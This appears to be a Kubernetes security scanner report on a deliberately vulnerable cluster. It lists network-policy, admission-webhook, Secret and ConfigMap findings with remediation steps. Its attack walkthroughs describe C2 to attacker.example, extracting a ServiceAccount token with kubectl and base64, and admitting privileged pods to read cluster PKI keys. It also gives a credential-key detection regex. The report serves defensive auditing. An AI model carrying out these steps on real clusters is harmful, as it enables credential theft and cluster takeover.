Namespace ingress-only has NetworkPolicy objects that select pods for ingress filtering but no NetworkPolicy enforces egress. In Kubernetes' policy model, ingress and egress are independent dimensions: a pod is isolated for ingress only if a policy with policyTypes: Ingress selects it, and isolated for egress only if a policy with policyTypes: Egress selects it. A pod can be tightly firewalled inbound and still reach the entire internet outbound, which is exactly the asymmetry seen here.

This is a classic misconfiguration after a half-finished zero-trust migration. Teams typically write ingress policies first because they think of "who can talk to my service," and ship without revisiting outbound. The result looks compliant in dashboards but leaves data exfiltration, cloud IMDS access, and outbound C2 wide open.

The practical risk is that egress is the dimension attackers actually want. Inbound restrictions help against external scanners, but a compromised pod's value to an attacker is in what it can talk *out* to: the cloud control plane via IMDS, attacker-controlled C2, internal databases in other namespaces, and the cluster's kube-apiserver.

Impact Compromised pods in this namespace retain full outbound reach. IMDS credential theft, C2 callbacks, and lateral pivots out of the namespace are unimpeded.
How an attacker abuses this
Background
ResourceNamespace

A Namespace divides cluster resources by team, environment, or application. RoleBindings, NetworkPolicies, ResourceQuotas, and most admission rules apply at namespace scope. Compromising one workload in a namespace often gives lateral access to the rest of that namespace's resources.

  1. Attacker compromises any pod in ingress-only.
  2. They hit IMDS. The namespace has no egress policy, so the request succeeds and node IAM credentials are exfiltrated.
  3. They establish C2 to attacker.example:443 and stream captured tokens, environment variables, and pod-mounted secrets.
  4. They pivot to other namespaces by talking to ClusterIP Services directly. The missing egress policy doesn't restrict cluster-internal destinations either.
  5. They call kube-apiserver with the pod's ServiceAccount token (egress to apiserver also unrestricted), enumerating RBAC for any privesc opportunity.
Remediation
Add a default-deny-egress NetworkPolicy in ingress-only, then explicit per-workload egress allowlists for DNS and actual outbound dependencies.
  1. Apply a default-deny-egress policy in ingress-only targeting podSelector: {} so every pod becomes egress-isolated.
  2. Add an explicit DNS-allow policy (UDP/TCP 53 to kube-system).
  3. For each workload that has legitimate egress, add a tight to: clause (specific Service, namespaceSelector+podSelector, or specific external CIDR; never 0.0.0.0/0).
  4. Validate by kubectl exec into a representative pod and confirming curl --max-time 3 https://example.com/ times out.
  5. Wire CI policy (Kyverno require-policytypes-egress) to fail any future namespace with ingress-only coverage.
Evidence
Namespaceingress-only
Show raw JSON
{
  "namespace": "ingress-only"
}
MEDIUM

NetworkPolicy flat-network/allow-broad accepts ingress from any namespace via empty namespaceSelector

KUBE-NETPOL-WEAKNESS-001 1 subject Score 5.5
MITRE ATT&CK: T1046T1018T1090T1078.004

Affected subject

MEDIUM NetworkPolicy/flat-network/allow-broad Object 5.5
NetworkPolicy flat-network/allow-broad accepts ingress from any namespace via empty namespaceSelector
Scope · Object NetworkPolicy flat-network/allow-broad: selected pods are reachable from every namespace, present and future
Category: Lateral Movement Resource: NetworkPolicy/flat-network/allow-broad Namespace: flat-network

NetworkPolicy flat-network/allow-broad contains an ingress from: peer with a namespaceSelector that has no matchLabels and no matchExpressions. In NetworkPolicy semantics this is the special form that means "every namespace in the cluster", which is exactly the opposite of the Kubernetes default for from: peers (which is "only the policy's own namespace").

In multi-tenant or shared clusters the impact is direct: namespace boundaries are the cheapest soft tenancy boundary Kubernetes offers, and namespaceSelector: {} invalidates that boundary for the selected pods. A compromised pod in any tenant (even one with no business need to talk to these pods) has unrestricted access on the allowed ports.

The correct pattern is to scope the namespaceSelector to the specific labels that identify allowed source namespaces (e.g., tenancy.example.com/team: data-platform) and combine it with an explicit podSelector so only the right pods in the right namespaces can connect. Combined selectors mean "pods matching label X in namespaces matching label Y": the AND form, not the OR form.

Impact Selected workloads are reachable from any pod in any namespace on the allowed ports. This defeats namespace-based tenant isolation and invites cross-tenant lateral movement.
How an attacker abuses this
  1. Attacker compromises a low-value pod in some other namespace (CI runner, stale demo, shared sidecar).
  2. They enumerate ClusterIP Services and notice the Service backing allow-broad's pods in flat-network.
  3. They attempt a TCP connect from the other namespace. Under any other policy this would be denied at the CNI, but namespaceSelector: {} matches and the connection succeeds.
  4. They exploit an application-layer issue on the now-reachable port (auth bypass, weak credential, RCE) and pivot into the high-value workload.
  5. They continue lateral motion from inside the target namespace using mounted tokens and secrets.
Remediation
Replace the empty namespaceSelector with explicit labels identifying the small set of namespaces that legitimately need access, paired with a podSelector.
  1. Identify which namespaces actually need to reach the selected pods (often one or two; never "all").
  2. Label those namespaces with a stable, policy-meaningful key (e.g., tenancy.example.com/team: data-platform).
  3. Edit allow-broad to replace namespaceSelector: {} with matchLabels for the chosen label, and add a sibling podSelector.
  4. Validate by attempting connections from a netshoot pod in a non-allowed namespace (must time out) and from an allowed namespace (must succeed).
  5. Add a Kyverno or OPA Gatekeeper rule that warns on any new NetworkPolicy with an empty namespaceSelector peer.
Evidence
Policyallow-broad
Show raw JSON
{
  "policy": "allow-broad"
}

Admission Webhooks

3 findings · 3 rules · 0 critical · 1 high · 2 medium · 0 low
HIGH

MutatingWebhookConfiguration risky-ignore-webhook/mutate.vulnerable.local is fail-open (failurePolicy: Ignore) on security-critical resources

KUBE-ADMISSION-001 1 subject Score 7.9
MITRE ATT&CK: T1562T1556T1525T1611

Affected subject

HIGH MutatingWebhookConfiguration/risky-ignore-webhook Cluster 7.9
MutatingWebhookConfiguration risky-ignore-webhook/mutate.vulnerable.local is fail-open (failurePolicy: Ignore) on security-critical resources
Scope · Cluster MutatingWebhookConfiguration risky-ignore-webhook (webhook entry mutate.vulnerable.local): applies to admission across the entire cluster
Category: Infrastructure Modification Resource: MutatingWebhookConfiguration/risky-ignore-webhook

The webhook mutate.vulnerable.local in MutatingWebhookConfiguration/risky-ignore-webhook intercepts create/update on security-critical resources (pods, deployments, daemonsets, statefulsets, jobs, cronjobs, or podtemplates) but its failurePolicy is set to Ignore. The Kubernetes admission docs are explicit: Ignore means "any error from the webhook is silently ignored, and the API request is allowed to continue". In practice, this means that if the webhook backend is unavailable, slow, or denies the request with an error, the offending pod/workload is admitted as if no policy existed.

Concretely, if the policy backend pod crashes, is rolling, has a network partition, fails its own admission, or returns an HTTP 500, then any pod can ship. That includes pods that violate Pod Security Standards, run as root, mount the host filesystem, or use hostNetwork. Beyond that, an attacker who can already trigger a denial-of-service against the webhook backend (high traffic, OOM via large requests, killing its pods) can deliberately disable enforcement and then admit privileged pods.

The failurePolicy choice is one of two: Fail (deny when the webhook is unavailable: the conservative production default) or Ignore (allow when unavailable: only appropriate for non-security webhooks like cosmetic mutators). Security webhooks (PSA replacements, image signing, network-policy injection, secret encryption) should always use Fail paired with objectSelector/namespaceSelector carve-outs that ensure the policy backend itself can come up before any other workload is admitted.

Impact Any outage or DoS of the webhook backend silently disables policy enforcement cluster-wide on the targeted resources. Privileged pods, root containers, and PSS-violating workloads can be admitted while monitoring shows the webhook "installed."
How an attacker abuses this
  1. Attacker enumerates webhook configurations (kubectl get MutatingWebhookConfiguration) and identifies that risky-ignore-webhook has failurePolicy: Ignore.
  2. They induce backend failure: kill the webhook's backing pods if they have RBAC for it, send oversized AdmissionReview payloads to OOM the backend, or simply wait for a deploy-time outage.
  3. While the webhook is unhealthy, they apply a privileged pod manifest (hostPID, hostNetwork, hostPath /, runAsUser 0).
  4. The API server calls the webhook, gets a connection-refused/timeout error, applies Ignore, and admits the pod. There is no audit trail noting that the webhook was bypassed beyond the API-server logs (which most teams do not alert on).
  5. From the privileged pod the attacker pivots: chroot into /host for full node compromise, dump secrets, persist a daemonset.
Remediation
Switch mutate.vulnerable.local.failurePolicy to Fail and confirm the webhook backend has the availability/HA characteristics needed for the cluster's admission rate.
  1. Edit MutatingWebhookConfiguration/risky-ignore-webhook and set webhooks[name=mutate.vulnerable.local].failurePolicy: Fail.
  2. Make sure the webhook backend is highly available (≥2 replicas, PodDisruptionBudget, anti-affinity, dedicated nodepool if it is on the critical admission path).
  3. Add a namespaceSelector carve-out so the webhook does not fight itself during cold start (e.g., exclude the namespace where the webhook backend runs).
  4. Add a SLO/alert for AdmissionReview latency and 5xx rate; failure-mode is now "deploys halt" instead of "policy silently disabled," which is preferable but needs visible monitoring.
  5. Consider migrating PSS-style enforcement to the in-tree Pod Security Admission so you have a non-webhook backstop that remains active even if the webhook fails to come up.
Evidence
failurePolicyIgnore
Webhook failures are silently allowed (admission policy effectively off)
Webhook rules
CREATE on core/v1:pods (*)
Show raw JSON
{
  "failurePolicy": "Ignore",
  "rules": [
    {
      "apiGroups": [
        ""
      ],
      "apiVersions": [
        "v1"
      ],
      "operations": [
        "CREATE"
      ],
      "resources": [
        "pods"
      ],
      "scope": "*"
    }
  ]
}
MEDIUM

MutatingWebhookConfiguration risky-ignore-webhook/mutate.vulnerable.local exempts sensitive system namespaces via namespaceSelector

KUBE-ADMISSION-003 1 subject Score 6.4
MITRE ATT&CK: T1562T1611T1578

Affected subject

MEDIUM MutatingWebhookConfiguration/risky-ignore-webhook Cluster 6.4
MutatingWebhookConfiguration risky-ignore-webhook/mutate.vulnerable.local exempts sensitive system namespaces via namespaceSelector
Scope · Cluster MutatingWebhookConfiguration risky-ignore-webhook (webhook entry mutate.vulnerable.local): applies to admission across the entire cluster
Category: Infrastructure Modification Resource: MutatingWebhookConfiguration/risky-ignore-webhook

Webhook mutate.vulnerable.local in MutatingWebhookConfiguration/risky-ignore-webhook has a namespaceSelector that uses NotIn or DoesNotExist to exempt kube-system (or another *-system namespace) from admission control. The exemption is sometimes a deliberate cold-start workaround (the webhook backend itself runs in kube-system and would deadlock if the webhook applied to it), but it routinely outlives the cold-start need and is rarely revisited.

Sensitive namespaces are exactly where admission control matters most. kube-system hosts coredns, kube-proxy, the cloud-controller-manager, CNI agents, the metrics-server, and most clusters' add-on operators: workloads that already run with high privilege. An attacker who can create resources in kube-system (e.g., via a stolen system: ServiceAccount token, an over-permissive roles/clusterroles create rule, or a privileged operator) finds the admission webhooks deliberately turned off for them.

This is also a defense-in-depth gap: even if a future privesc finding (KUBE-PRIVESC-*) is mitigated, the namespace-selector exemption keeps the door open. The right pattern is to scope the exemption to the *single* control-plane namespace the backend itself needs (and only at boot), not to every -system namespace by suffix.

Impact An attacker who can create pods or other resources in the exempted system namespace bypasses every check this webhook implements: root containers, hostPath mounts, and arbitrary images all admit silently.
How an attacker abuses this
  1. Attacker compromises a workload with create pods permission scoped to kube-system (typical of operators, addon managers, or stolen control-plane tokens).
  2. They submit a pod manifest with hostPath: /, runAsUser: 0, and securityContext.privileged: true.
  3. The API server evaluates mutate.vulnerable.local's namespaceSelector, sees the exemption for kube-system, and admits the pod without invoking the webhook.
  4. The pod schedules on a control-plane-adjacent node, mounts the host root filesystem, and reads /etc/kubernetes/pki/* (etcd CA, apiserver cert, kubelet client cert).
  5. With those keys the attacker forges admin credentials and assumes full cluster control.
Remediation
Narrow mutate.vulnerable.local.namespaceSelector to the exact namespace the webhook backend needs to skip during cold start, or remove the exemption entirely once the backend is bootstrapped.
  1. Check why mutate.vulnerable.local excludes the namespace. Is it a cold-start workaround or a permanent carve-out?
  2. If cold-start: scope the exemption to the *exact* namespace the webhook backend runs in (e.g., kubernetes.io/metadata.name NotIn [policy-system]), not every *-system.
  3. If permanent carve-out: replace it with the in-tree Pod Security Admission level for that namespace so privileged pods still face *some* check.
  4. Validate by dry-running a privileged pod manifest in the previously-exempted namespace; the webhook should now process the request.
  5. Wire a Kyverno or OPA Gatekeeper rule that fails any future webhook configuration that exempts kube-system or a *-system namespace without a documented justification annotation.
Evidence
namespaceSelector
label kubernetes.io/metadata.name is NOT one of [kube-system]
Show raw JSON
{
  "namespaceSelector": {
    "matchExpressions": [
      {
        "key": "kubernetes.io/metadata.name",
        "operator": "NotIn",
        "values": [
          "kube-system"
        ]
      }
    ]
  }
}
MEDIUM

MutatingWebhookConfiguration risky-ignore-webhook/mutate.vulnerable.local can be bypassed by omitting the workload-controlled labels in objectSelector

KUBE-ADMISSION-002 1 subject Score 6.1
MITRE ATT&CK: T1562T1556T1578

Affected subject

MEDIUM MutatingWebhookConfiguration/risky-ignore-webhook Cluster 6.1
MutatingWebhookConfiguration risky-ignore-webhook/mutate.vulnerable.local can be bypassed by omitting the workload-controlled labels in objectSelector
Scope · Cluster MutatingWebhookConfiguration risky-ignore-webhook (webhook entry mutate.vulnerable.local): applies to admission across the entire cluster
Category: Infrastructure Modification Resource: MutatingWebhookConfiguration/risky-ignore-webhook

Webhook mutate.vulnerable.local in MutatingWebhookConfiguration/risky-ignore-webhook uses an objectSelector, which limits its admission rules to objects whose own labels match the selector. Because Kubernetes lets the workload author set arbitrary labels on the object they are creating, an objectSelector that gates security policy is opt-in: an attacker (or a careless developer) creates the same pod without the matching labels and the webhook never sees it.

This is structurally different from namespaceSelector (which gates by namespace labels; namespaces are a higher-trust object that workload authors typically can't relabel). objectSelector checks the labels on the resource being admitted, so a pod manifest that simply omits the policy's gating label slips past untouched. The Kubernetes API reference notes this explicitly: "If you skip the security label, the webhook is not called."

For policy-enforcing webhooks (PSS replacements, image-signing, sidecar injection of security tooling) this is the wrong tool. The right pattern is to inversely scope the webhook: select *all* objects (objectSelector: {} or absent) and use a namespaceSelector plus carefully targeted opt-out labels (e.g., policy.example.com/exempt: true) that are themselves gated by RBAC on the namespace, not on the pod author.

Impact Workload authors (legitimate or hostile) can opt out of admission enforcement simply by not setting the gating labels on their pods. This defeats the point of the webhook for any user with create permission on the targeted resources.
How an attacker abuses this
  1. Attacker reads MutatingWebhookConfiguration/risky-ignore-webhook and notes the objectSelector requires e.g. app.kubernetes.io/managed-by: platform.
  2. They author a pod manifest that omits the app.kubernetes.io/managed-by label entirely.
  3. They kubectl apply it; the API server evaluates the objectSelector, finds it does not match, skips the webhook, and admits the pod.
  4. The pod runs with whatever the namespace defaults allow, including PSS-violating settings the webhook was supposed to block.
  5. Because nothing logs "webhook skipped due to objectSelector," the bypass is invisible in the SIEM unless the team explicitly audits AdmissionReview misses.
Remediation
Replace objectSelector-based gating on mutate.vulnerable.local with namespaceSelector plus an RBAC-protected exemption label, or remove the selector and let the webhook see every object.
  1. Audit what mutate.vulnerable.local is trying to gate. If the goal is "only apply to pods in tenant namespaces," use namespaceSelector (namespace labels are higher-trust).
  2. If you need an exemption mechanism, add a policy.example.com/exempt: true label *on the namespace* and protect it with RBAC so workload authors cannot grant their own exemption.
  3. Edit MutatingWebhookConfiguration/risky-ignore-webhook and either drop webhooks[name=mutate.vulnerable.local].objectSelector or invert it to a default-on form.
  4. Re-test by attempting to create a pod that previously bypassed admission; it should now be evaluated.
  5. If the webhook ships with the cluster's admission stack, document the new exemption flow so platform users know how to request one.
Evidence
objectSelector
label admission = enabled
Show raw JSON
{
  "objectSelector": {
    "matchLabels": {
      "admission": "enabled"
    }
  }
}

Secrets & ConfigMaps

2 findings · 2 rules · 0 critical · 1 high · 1 medium · 0 low
HIGH

Secret vulnerable/legacy-token is a long-lived kubernetes.io/service-account-token (legacy, no expiry)

KUBE-SECRETS-001 1 subject Score 7.8

Affected subject

HIGH Secret/vulnerable/legacy-token Object 7.8
Secret vulnerable/legacy-token is a long-lived kubernetes.io/service-account-token (legacy, no expiry)
Scope · Object Secret vulnerable/legacy-token: credential is valid until manually deleted; readable by any subject with get/list secrets in vulnerable
Category: Data Exfiltration Resource: Secret/vulnerable/legacy-token Namespace: vulnerable

Secret vulnerable/legacy-token has type kubernetes.io/service-account-token. This is the legacy ServiceAccount token model: the token-controller persists a JWT into a Secret, the token has *no expiry* (the audience is the API server, the validity is open-ended), and it is readable by any subject with get/list secrets permission in the namespace.

Since Kubernetes v1.22, Bound ServiceAccount Tokens (KEP-1205) replaced this model: the kubelet projects a *new* token into the pod's filesystem with a short TTL (default 1h) and the token is bound to the pod object, so deleting the pod invalidates the token. v1.24 stopped auto-creating these legacy Secret tokens, and v1.27+ ships the LegacyServiceAccountTokenCleaner controller that removes unused ones automatically. A legacy token Secret today is either an artifact of a pre-1.24 cluster, a manually-created serviceAccountToken Secret, or a controller that explicitly created one. None of these carry the bind-to-pod, time-bounded properties of projected tokens.

The risk profile: a leaked legacy token grants whatever permissions its ServiceAccount has, *forever*, with no automatic revocation. It survives Pod restarts, node reboots, audit events, and rotation of the SA itself. Detection of misuse requires explicit audit-log monitoring against the SA name; rotation requires deleting the Secret and reissuing.

Impact Anyone who exfiltrates this Secret holds a non-expiring credential with the ServiceAccount's full RBAC; rotation requires manual kubectl delete secret and re-issue, and there is no time-based mitigation.
How an attacker abuses this
Background
ResourceSecret

A Secret holds sensitive data: registry pull credentials, TLS private keys, ServiceAccount tokens. Secrets are base64-encoded, not encrypted by default. Anyone with get on the Secret resource can read the contents in cleartext. get/list/watch on Secrets in kube-system is effectively cluster-admin: that namespace holds the controller-manager and kube-scheduler tokens.

Kubernetes docs ↗
  1. Attacker compromises any subject with get secrets in vulnerable (e.g., a forgotten view-style role, an over-permissive ConfigMap-reader role that wildcards resources, or a pod token with secret-read).
  2. They kubectl get secret legacy-token -n vulnerable -o jsonpath='{.data.token}' | base64 -d and obtain the raw JWT.
  3. They use the token against the kube-apiserver from outside the cluster (kubectl --token=...). No pod, no node, no IMDS hop required.
  4. Because the token has no exp claim and no audience binding to a Pod, it remains valid weeks or months later. Rotation in IR is manual: delete the Secret + recreate, and any cached copies attacker has are *still valid until that delete*.
  5. Attacker uses the SA's RBAC to read other Secrets, list pods cluster-wide (if SA has it), exec into pods, or escalate via any of the privesc paths the SA enables.
Remediation
Migrate the consumer of vulnerable/legacy-token to a projected ServiceAccount token, then delete the Secret. Enable LegacyServiceAccountTokenCleaner on the cluster.
  1. Identify what reads vulnerable/legacy-token: kubectl get pods -A -o json | jq '.items[] | select(.spec.volumes[]?.secret.secretName == "legacy-token") | .metadata.namespace + "/" + .metadata.name'. Also check Jobs, CronJobs, and external systems that might have copied the token out.
  2. Migrate each consumer to a projected SA token (serviceAccountToken projection in volumes) with a sensible expirationSeconds (e.g., 3600). The kubelet will refresh it automatically.
  3. For external consumers (CI runners, dashboards) that need a long-lived token, use TokenRequest API on demand instead of a stored Secret, or rotate via a sealed-secret / external-secret-store flow.
  4. kubectl delete secret legacy-token -n vulnerable once consumers are migrated. Confirm no pod has a CrashLoopBackOff that mentions the missing token.
  5. Enable the LegacyServiceAccountTokenCleaner (default on v1.29+) so future stragglers get garbage-collected after their last-used timestamp ages out.
Evidence
Typekubernetes.io/service-account-token
Long-lived ServiceAccount token (holding it is acting as the SA)
Show raw JSON
{
  "type": "kubernetes.io/service-account-token"
}
MEDIUM

ConfigMap vulnerable/app-config exposes credential-shaped keys (api_token, db_password) in plaintext

KUBE-CONFIGMAP-001 1 subject Score 6.3

Affected subject

MEDIUM ConfigMap/vulnerable/app-config Object 6.3
ConfigMap vulnerable/app-config exposes credential-shaped keys (api_token, db_password) in plaintext
Scope · Object ConfigMap vulnerable/app-config: readable by every subject with get configmaps in vulnerable, ships unencrypted in etcd, surfaces in kubectl describe and audit logs
Category: Data Exfiltration Resource: ConfigMap/vulnerable/app-config Namespace: vulnerable

ConfigMap vulnerable/app-config contains keys with names matching credential-like patterns: api_token, db_password. The Kubernetes API treats ConfigMaps as non-sensitive: etcd stores them unencrypted by default (encryption-at-rest is opt-in and almost always limited to Secrets), kubectl describe configmap prints values inline, audit logs include the data on get/list, and RBAC defaults give workload service accounts much wider read on ConfigMaps than on Secrets.

Storing a credential in a ConfigMap therefore violates the basic Kubernetes data-classification model in three ways simultaneously: (1) it appears in plaintext to anyone with get configmaps (a much larger set of subjects than get secrets); (2) it ends up in cluster backups, etcd dumps, and platform observability tooling that explicitly excludes Secrets; (3) it does not benefit from any of the surface area Kubernetes builds around Secrets (envelope encryption, file-mode 0600 projection, KMS provider, External Secrets Operator).

The matched keys are heuristic, since key matches both apiKey and public_key, so review is required before assuming compromise. In practice the pattern is strong: in production clusters this finding correlates with real leaks the majority of the time. Treat as exposed-until-proven-otherwise.

Impact If any of the flagged keys (api_token, db_password) actually hold a credential, that credential is exposed to a wide audience: every workload SA in vulnerable, every backup operator, every audit log consumer, and possibly cluster-mirroring tooling.
How an attacker abuses this
Background
ResourceConfigMap

A ConfigMap stores plain-text configuration that pods read at startup. They are not meant to hold secrets, but in practice teams put database URLs (with passwords), API keys, and tokens in ConfigMaps. Kubesplaining flags credential-shaped keys for that reason.

  1. Attacker compromises a workload in vulnerable whose ServiceAccount has get configmaps (the typical default view role grants it).
  2. They kubectl get cm app-config -n vulnerable -o yaml and read the matched keys directly. No decoding needed since ConfigMap data is plaintext.
  3. They identify the credential class (DB connection string, API key, OAuth client_secret, signing key) from the key name and value shape.
  4. They use the credential immediately: DB connection strings often grant the same write permission the application has; API keys often have no IP restriction; client_secrets unlock the upstream identity provider.
  5. Because audit-log review on ConfigMaps is rare, the read goes unnoticed until the upstream credential is rotated for unrelated reasons.
Remediation
Move the credential out of vulnerable/app-config into a Kubernetes Secret (or, better, an external secret store) and remove the keys from the ConfigMap.
  1. Inspect each matched key (api_token, db_password) to confirm whether it is a real credential. Some keys like cache_key_prefix are false positives.
  2. For real credentials, create a Secret in vulnerable and update consumers (envFrom or volume mounts) to read from the Secret.
  3. Rotate the credential at its source: if it was already in plaintext in a ConfigMap, treat it as compromised (assume any subject with view-on-configmaps had access).
  4. Remove the credential keys from vulnerable/app-config. Verify the consumer still works (kubectl rollout status).
  5. Wire prevention: a Kyverno cluster policy that warns on ConfigMap.data keys matching password|secret|token|credential|api_?key|access_?key|client_secret|connection_string|dsn. Pair with External Secrets Operator so the right path of least resistance is to use a real secret store.
Evidence
Matched keysapi_tokendb_password
Show raw JSON
{
  "matched_keys": [
    "api_token",
    "db_password"
  ]
}